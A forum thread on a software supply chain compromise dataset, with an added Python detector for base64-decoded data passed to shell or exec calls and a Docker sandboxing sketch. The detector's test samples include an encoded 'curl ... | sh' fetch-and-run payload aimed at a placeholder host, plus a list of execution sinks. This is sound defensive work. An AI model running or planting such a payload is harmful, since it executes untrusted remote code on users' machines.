software-supply-chain-compromises (discontinued): A dataset of software supply chain compromises. Please help us maintain it!
> a base 64 encrypted string that gets decrypted and then passed to a shell.
This is a very common malicious behavior. Packj detects obfuscation [1] as well as spawning of shell commands (exec system call) [2]. I've updated threats.csv to flag code obfuscation.
1. https://github.com/ossillate-inc/packj/blob/main/main.py#L48...
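An added example of the detection the comment above describes, written for this page and not taken from Packj: a small Python AST pass that flags a decoder call (`base64.b64decode` and friends) whose result is passed straight into a shell or code-execution sink. The three package snippets it scans are constructed here for illustration; the sink and decoder lists are my choices. It also resolves `from base64 import b64decode as d` aliases, since renaming the decoder is the first thing a malicious setup.py does to dodge a grep.

```python
import ast

# Decoder names from the base64 module; any of these turning a string literal into
# bytes that then reach a shell or exec()/eval() is the pattern being flagged.
DECODER_NAMES = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode",
                 "decodebytes", "urlsafe_b64decode"}
SHELL_SINKS = {"os.system", "os.popen", "subprocess.Popen", "subprocess.run",
               "subprocess.call", "subprocess.check_call", "subprocess.check_output"}
CODE_SINKS = {"exec", "eval"}

# Constructed samples (not real packages) in the style of a malicious setup.py.
SUSPICIOUS_SRC = '''
import base64, subprocess
payload = "Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vaW5zdGFsbC5zaCB8IHNo"
subprocess.Popen(base64.b64decode(payload), shell=True)
'''
ALIASED_SRC = '''
from base64 import b64decode as d
exec(d("cHJpbnQoJ2hpJyk="))
'''
BENIGN_SRC = '''
import base64
token = base64.b64encode(b"user:pass").decode()
print(token)
'''


def dotted_name(node):
    """Return 'pkg.attr' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def decoder_names(tree):
    """DECODER_NAMES plus any local aliases created by 'from base64 import X as Y'."""
    names = set(DECODER_NAMES)
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom) and node.module == "base64":
            for alias in node.names:
                if alias.name in DECODER_NAMES:
                    names.add(alias.asname or alias.name)
    return names


def contains_decoder(node, names):
    """True if any call inside this subtree is to a known decoder."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            callee = dotted_name(sub.func)
            if callee and callee.rsplit(".", 1)[-1] in names:
                return True
    return False


def find_decode_to_exec(source):
    """Return [(lineno, description)] for sink calls fed directly by a decoder call."""
    tree = ast.parse(source)
    names = decoder_names(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        callee = dotted_name(node.func)
        if callee not in SHELL_SINKS and callee not in CODE_SINKS:
            continue
        args = list(node.args) + [kw.value for kw in node.keywords]
        if any(contains_decoder(a, names) for a in args):
            findings.append((node.lineno, f"decoded data passed to {callee}"))
    return findings


if __name__ == "__main__":
    for label, src in [("suspicious", SUSPICIOUS_SRC), ("aliased", ALIASED_SRC),
                       ("benign", BENIGN_SRC)]:
        print(label, find_decode_to_exec(src))
```

This only catches the decoder nested directly inside the sink call. Splitting the two steps across a variable (`cmd = b64decode(x)` on one line, `os.system(cmd)` on the next) or decoding via `codecs`, `zlib` or a hand-rolled XOR loop slips past it, which is why a real scanner pairs this kind of static pattern with a separate "long high-entropy string literal" check and with runtime tracing of the exec/spawn calls themselves.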
> I like Android's system of per-app uid/gid. But AFAIK it's not implemented by any mainstream Linux kernel or distro.
You can create users manually for each app.
For GUI apps, https://firejail.wordpress.com/
Sure. Please email me (in profile) for the list. You can also look at the following resources for malware samples:
1. https://github.com/IQTLabs/software-supply-chain-compromises
I hacked up a bash script for running an arbitrary command in a docker container, mounting only PWD. It traces dynamic libraries through ldd and creates a new image for each unique command. I got it working for ffmpeg:
https://github.com/paskozdilar/dockerify
I might try to optimize it a little bit later, perhaps bind-mount dynamic libraries instead of creating a new image for each command.
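A Python sketch of the same idea, added here for illustration and not the dockerify script linked above (which is bash): parse ldd output into the list of files to copy, derive one image tag per distinct binary-plus-library set, emit a `FROM scratch` Dockerfile, and build the `docker run` line that mounts only the working directory. The ldd output is constructed, and the tag format, staging layout and hardening flags are my choices.

```python
import hashlib
import re

# Constructed ldd output for an ffmpeg-like binary; not captured from a real machine.
SAMPLE_LDD = """\
\tlinux-vdso.so.1 (0x00007ffd3c5e9000)
\tlibavcodec.so.58 => /usr/lib/x86_64-linux-gnu/libavcodec.so.58 (0x00007f1a2c000000)
\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1a2bc00000)
\tlibmissing.so.1 => not found
\t/lib64/ld-linux-x86-64.so.2 (0x00007f1a2d000000)
"""

# "name => /path (0xaddr)", or just "/path (0xaddr)" for the dynamic loader.
LOADED = re.compile(r"^\s*(?:\S+\s+=>\s+)?(/\S+)\s+\(0x[0-9a-f]+\)\s*$")
NOT_FOUND = re.compile(r"^\s*(\S+)\s+=>\s+not found\s*$")


def parse_ldd(text):
    """Split ldd output into (absolute paths to copy, libraries ldd could not resolve)."""
    paths, missing = [], []
    for line in text.splitlines():
        m = LOADED.match(line)
        if m:
            paths.append(m.group(1))
            continue
        m = NOT_FOUND.match(line)
        if m:
            missing.append(m.group(1))
        # Anything else (linux-vdso.so.1 is mapped by the kernel) has no file on
        # disk and is skipped.
    return paths, missing


def image_tag(binary, libs):
    """One image per distinct (binary, library set): the tag is a hash of that set."""
    digest = hashlib.sha256("\n".join([binary] + sorted(libs)).encode()).hexdigest()
    return f"dockerify/{binary.rsplit('/', 1)[-1]}:{digest[:12]}"


def dockerfile_for(binary, libs):
    """Minimal image holding only the binary and the exact libraries ldd reported.

    Sources are written as ./usr/... because docker COPY reads from the build
    context, so the files must first be staged into a context directory with
    their paths preserved (cp -L --parents <path> <ctx>); -L dereferences
    symlinks such as /lib64/ld-linux-x86-64.so.2 so a real file is copied.
    """
    lines = ["FROM scratch"]
    for path in sorted(set(libs + [binary])):
        lines.append(f"COPY .{path} {path}")
    lines.append("WORKDIR /work")
    lines.append(f'ENTRYPOINT ["{binary}"]')
    return "\n".join(lines) + "\n"


def run_argv(tag, host_dir, cmd_args):
    """docker run line that mounts only host_dir and drops the usual extras."""
    return ["docker", "run", "--rm",
            "--network", "none",            # transcoding a local file needs no network
            "--cap-drop", "ALL",
            "--security-opt", "no-new-privileges",
            "--read-only",                  # rootfs immutable; only /work is writable
            "-v", f"{host_dir}:/work",
            "-w", "/work",
            tag, *cmd_args]


if __name__ == "__main__":
    binary = "/usr/bin/ffmpeg"
    libs, missing = parse_ldd(SAMPLE_LDD)
    tag = image_tag(binary, libs)
    print(dockerfile_for(binary, libs))
    print(" ".join(run_argv(tag, "/home/user/videos", ["-i", "in.mp4", "out.webm"])))
    if missing:
        print("unresolved at link time:", ", ".join(missing))
```

Two caveats a practitioner should keep in mind. ldd resolves the link-time dependency graph only: libraries the program opens later with dlopen() (codec or hardware-acceleration plugins, for instance) never appear in its output, so the image builds cleanly and the command fails at runtime; the `not found` list above only surfaces gaps the loader already knows about. And ldd works by invoking the dynamic loader on the target, which on some older glibc builds could execute code from the binary being inspected, so trace only binaries you already trust, or read the NEEDED entries with `objdump -p` instead and resolve them yourself.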